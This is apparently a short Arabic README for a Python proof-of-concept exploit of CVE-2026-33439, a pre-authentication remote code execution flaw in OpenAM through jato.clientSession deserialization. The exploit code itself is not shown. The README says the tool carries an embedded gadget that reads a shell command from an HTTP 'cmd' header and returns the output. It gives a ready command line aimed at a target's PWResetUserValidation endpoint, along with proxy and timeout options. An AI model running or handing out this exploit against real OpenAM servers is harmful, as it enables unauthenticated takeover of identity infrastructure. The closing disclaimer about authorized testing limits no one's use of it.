
Python PoC لـ CVE-2026-33439، وهو RCE قبل المصادقة في OpenAM عبر إلغاء تسلسل jato.clientSession
إثبات مفهوم Python مستقل لثغرة تنفيذ التعليمات البرمجية عن بُعد قبل المصادقة في OpenAM ضمن إلغاء تسلسل jato.clientSession.
تقرأ أداة Click/Xalan المضمّنة والمظللة أمر shell من ترويسة HTTP باسم cmd وتعيد مخرجاته في استجابة HTTP. لا حاجة إلى حزم Python خارجية أو بيئة تشغيل Java أو ملفات JAR.
python3 exploit.py \
--url https://target.example/openam/ui/PWResetUserValidation \
'id'
وسائط اختيارية:
--timeout SECONDS Request timeout (default: 15)
--proxy URL HTTP proxy, for example http://127.0.0.1:8080
--verify-tls Enable TLS certificate verification
استخدمها فقط ضد الأنظمة التي تملكها أو المصرّح لك صراحةً باختبارها.